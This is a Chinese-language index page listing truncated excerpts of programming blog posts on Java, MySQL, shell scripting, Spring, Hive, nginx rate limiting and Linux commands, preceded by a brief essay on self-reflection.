    自省是一面镜子,可以照见心灵上的脏污,同而照亮前进的路途。工作中有很多人经常怨天尤人,就是不在自己身上找原因。实际上一个人失败的原因是多方面,只有从多方面入手寻找失败的原因,有针对性地进行自省,才能起到纠错的作用。看到比自己好的人,就要争取进步与之齐头并进,见到不好的就要反思自己是否也有这样的错误或者坏习惯,这样才不至于严于待人,宽以待己。如果想成为一个成功的人,伟大的人就必须要严于律己,宽以待人
  • JAVA中的Enum 周凡杨 javaenum枚举
    Enum是计算机编程语言中的一种数据类型---枚举类型。 在实际问题中,有些变量的取值被限定在一个有限的范围内。     例如,一个星期内只有七天 我们通常这样实现上面的定义: public String monday; public String tuesday; public String wensday; public String thursday
  • 赶集网mysql开发36条军规 Bill_chen mysql业务架构设计mysql调优mysql性能优化
    (一)核心军规 (1)不在数据库做运算    cpu计算务必移至业务层; (2)控制单表数据量    int型不超过1000w,含char则不超过500w;    合理分表;    限制单库表数量在300以内; (3)控制列数量    字段少而精,字段数建议在20以内
  • Shell test命令 daizj shell字符串test数字文件比较
    Shell test命令 Shell中的 test 命令用于检查某个条件是否成立,它可以进行数值、字符和文件三个方面的测试。 数值测试 参数 说明 -eq 等于则为真 -ne 不等于则为真 -gt 大于则为真 -ge 大于等于则为真 -lt 小于则为真 -le 小于等于则为真 实例演示: num1=100 num2=100if test $[num1]
  • XFire框架实现WebService(二) 周凡杨 javawebservice
       有了XFire框架实现WebService(一),就可以继续开发WebService的简单应用。 Webservice的服务端(WEB工程): 两个java bean类: Course.java    package cn.com.bean; public class Course {     private
  • 重绘之画图板 朱辉辉33 画图板
           上次博客讲的五子棋重绘比较简单,因为只要在重写系统重绘方法paint()时加入棋盘和棋子的绘制。这次我想说说画图板的重绘。        画图板重绘难在需要重绘的类型很多,比如说里面有矩形,园,直线之类的,所以我们要想办法将里面的图形加入一个队列中,这样在重绘时就
  • Java的IO流 西蜀石兰 java
    刚学Java的IO流时,被各种inputStream流弄的很迷糊,看老罗视频时说想象成插在文件上的一根管道,当初听时觉得自己很明白,可到自己用时,有不知道怎么代码了。。。 每当遇到这种问题时,我习惯性的从头开始理逻辑,会问自己一些很简单的问题,把这些简单的问题想明白了,再看代码时才不会迷糊。 IO流作用是什么? 答:实现对文件的读写,这里的文件是广义的; Java如何实现程序到文件
  • No matching PlatformTransactionManager bean found for qualifier 'add' - neither 林鹤霄
    java.lang.IllegalStateException: No matching PlatformTransactionManager bean found for qualifier 'add' - neither qualifier match nor bean name match!   网上找了好多的资料没能解决,后来发现:项目中使用的是xml配置的方式配置事务,但是
  • Row size too large (> 8126). Changing some columns to TEXT or BLOB aigo column
    原文:http://stackoverflow.com/questions/15585602/change-limit-for-mysql-row-size-too-large   异常信息: Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMAT=DYNAM
  • JS 格式化时间 alxw4616 JavaScript
    /** * 格式化时间 2013/6/13 by 半仙 [email protected] * 需要 pad 函数 * 接收可用的时间值. * 返回替换时间占位符后的字符串 * * 时间占位符:年 Y 月 M 日 D 小时 h 分 m 秒 s 重复次数表示占位数 * 如 YYYY 4占4位 YY 占2位<p></p> * MM DD hh mm
  • 队列中数据的移除问题 百合不是茶 队列移除
         队列的移除一般都是使用的remov();都可以移除的,但是在昨天做线程移除的时候出现了点问题,没有将遍历出来的全部移除,  代码如下;      // package com.Thread0715.com; import java.util.ArrayList; public class Threa
  • Runnable接口使用实例 bijian1013 javathreadRunnablejava多线程
    Runnable接口 a.       该接口只有一个方法:public void run(); b.       实现该接口的类必须覆盖该run方法 c.       实现了Runnable接口的类并不具有任何天
  • oracle里的extend详解 bijian1013 oracle数据库extend
    扩展已知的数组空间,例: DECLARE TYPE CourseList IS TABLE OF VARCHAR2(10); courses CourseList; BEGIN -- 初始化数组元素,大小为3 courses := CourseList('Biol 4412 ', 'Psyc 3112 ', 'Anth 3001 '); --
  • 【httpclient】httpclient发送表单POST请求 bit1129 httpclient
    浏览器Form Post请求 浏览器可以通过提交表单的方式向服务器发起POST请求,这种形式的POST请求不同于一般的POST请求 1. 一般的POST请求,将请求数据放置于请求体中,服务器端以二进制流的方式读取数据,HttpServletRequest.getInputStream()。这种方式的请求可以处理任意数据形式的POST请求,比如请求数据是字符串或者是二进制数据 2. Form
  • 【Hive十三】Hive读写Avro格式的数据 bit1129 hive
     1. 原始数据 hive> select * from word; OK 1 MSN 10 QQ 100 Gtalk 1000 Skype      2. 创建avro格式的数据表   hive> CREATE TABLE avro_table(age INT, name STRING)STORE
  • nginx+lua+redis自动识别封解禁频繁访问IP ronin47
    在站点遇到攻击且无明显攻击特征,造成站点访问慢,nginx不断返回502等错误时,可利用nginx+lua+redis实现在指定的时间段 内,若单IP的请求量达到指定的数量后对该IP进行封禁,nginx返回403禁止访问。利用redis的expire命令设置封禁IP的过期时间达到在 指定的封禁时间后实行自动解封的目的。 一、安装环境: CentOS x64 release 6.4(Fin
  • java-二叉树的遍历-先序、中序、后序(递归和非递归)、层次遍历 bylijinnan java
    import java.util.LinkedList; import java.util.List; import java.util.Stack; public class BinTreeTraverse { //private int[] array={ 1, 2, 3, 4, 5, 6, 7, 8, 9 }; private int[] array={ 10,6,
  • Spring源码学习-XML 配置方式的IoC容器启动过程分析 bylijinnan javaspringIOC
    以FileSystemXmlApplicationContext为例,把Spring IoC容器的初始化流程走一遍: ApplicationContext context = new FileSystemXmlApplicationContext ("C:/Users/ZARA/workspace/HelloSpring/src/Beans.xml&q
  • [科研与项目]民营企业请慎重参与军事科技工程 comsci 企业
         军事科研工程和项目 并非要用最先进,最时髦的技术,而是要做到“万无一失”    而民营科技企业在搞科技创新工程的时候,往往考虑的是技术的先进性,而对先进技术带来的风险考虑得不够,在今天提倡军民融合发展的大环境下,这种“万无一失”和“时髦性”的矛盾会日益凸显。。。。。。所以请大家在参与任何重大的军事和政府项目之前,对
  • spring 定时器-两种方式 cuityang springquartz定时器
    方式一: 间隔一定时间 运行 <bean id="updateSessionIdTask" class="com.yang.iprms.common.UpdateSessionTask" autowire="byName" /> <bean id="updateSessionIdSchedule
  • 简述一下关于BroadView站点的相关设计 damoqiongqiu view
    终于弄上线了,累趴,戳这里http://www.broadview.com.cn   简述一下相关的技术点   前端:jQuery+BootStrap3.2+HandleBars,全站Ajax(貌似对SEO的影响很大啊!怎么破?),用Grunt对全部JS做了压缩处理,对部分JS和CSS做了合并(模块间存在很多依赖,全部合并比较繁琐,待完善)。   后端:U
  • 运维 PHP问题汇总 dcj3sjt126com windows2003
    1、Dede(织梦)发表文章时,内容自动添加关键字显示空白页 解决方法: 后台>系统>系统基本参数>核心设置>关键字替换(是/否),这里选择“是”。 后台>系统>系统基本参数>其他选项>自动提取关键字,这里选择“是”。   2、解决PHP168超级管理员上传图片提示你的空间不足 网站是用PHP168做的,反映使用管理员在后台无法
  • mac 下 安装php扩展 - mcrypt dcj3sjt126com PHP
    MCrypt是一个功能强大的加密算法扩展库,它包括有22种算法,phpMyAdmin依赖这个PHP扩展,具体如下: 下载并解压libmcrypt-2.5.8.tar.gz。 在终端执行如下命令: tar zxvf libmcrypt-2.5.8.tar.gz cd libmcrypt-2.5.8/ ./configure --disable-posix-threads --
  • MongoDB更新文档 [四] eksliang mongodbMongodb更新文档
    MongoDB更新文档 转载请出自出处:http://eksliang.iteye.com/blog/2174104 MongoDB对文档的CURD,前面的博客简单介绍了,但是对文档更新篇幅比较大,所以这里单独拿出来。 语法结构如下: db.collection.update( criteria, objNew, upsert, multi) 参数含义 参数   
  • Linux下的解压,移除,复制,查看tomcat命令 y806839048 tomcat
    重复myeclipse生成webservice有问题删除以前的,干净 1、先切换到:cd usr/local/tomcat5/logs 2、tail -f catalina.out 3、这样运行时就可以实时查看运行日志了 Ctrl+c 是退出tail命令。 有问题不明的先注掉   cp /opt/tomcat-6.0.44/webapps/g
  • Spring之使用事务缘由(3-XML实现) ihuning spring
      用事务通知声明式地管理事务   事务管理是一种横切关注点。为了在 Spring 2.x 中启用声明式事务管理,可以通过 tx Schema 中定义的 <tx:advice> 元素声明事务通知,为此必须事先将这个 Schema 定义添加到 <beans> 根元素中去。声明了事务通知后,就需要将它与切入点关联起来。由于事务通知是在 <aop:
  • GCD使用经验与技巧浅谈 啸笑天 GC
    前言 GCD(Grand Central Dispatch)可以说是Mac、iOS开发中的一大“利器”,本文就总结一些有关使用GCD的经验与技巧。 dispatch_once_t必须是全局或static变量 这一条算是“老生常谈”了,但我认为还是有必要强调一次,毕竟非全局或非static的dispatch_once_t变量在使用时会导致非常不好排查的bug,正确的如下: 1
  • linux(Ubuntu)下常用命令备忘录1 macroli linux工作ubuntu
    在使用下面的命令是可以通过--help来获取更多的信息1,查询当前目录文件列表:ls ls命令默认状态下将按首字母升序列出你当前文件夹下面的所有内容,但这样直接运行所得到的信息也是比较少的,通常它可以结合以下这些参数运行以查询更多的信息:  ls / 显示/.下的所有文件和目录  ls -l 给出文件或者文件夹的详细信息 ls -a 显示所有文件,包括隐藏文
  • nodejs同步操作mysql qiaolevip 学习永无止境每天进步一点点mysqlnodejs
    // db-util.js var mysql = require('mysql'); var pool = mysql.createPool({ connectionLimit : 10, host: 'localhost', user: 'root', password: '', database: 'test', port: 3306 });
  • 一起学Hive系列文章 superlxw1234 hiveHive入门
      [一起学Hive]系列文章 目录贴,入门Hive,持续更新中。   [一起学Hive]之一—Hive概述,Hive是什么 [一起学Hive]之二—Hive函数大全-完整版 [一起学Hive]之三—Hive中的数据库(Database)和表(Table) [一起学Hive]之四-Hive的安装配置 [一起学Hive]之五-Hive的视图和分区 [一起学Hive
  • Spring开发利器:Spring Tool Suite 3.7.0 发布 wiselyman spring
    Spring Tool Suite(简称STS)是基于Eclipse,专门针对Spring开发者提供大量的便捷功能的优秀开发工具。   在3.7.0版本主要做了如下的更新:   将eclipse版本更新至Eclipse Mars 4.5 GA Spring Boot(JavaEE开发的颠覆者集大成者,推荐大家学习)的配置语言YAML编辑器的支持(包含自动提示,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他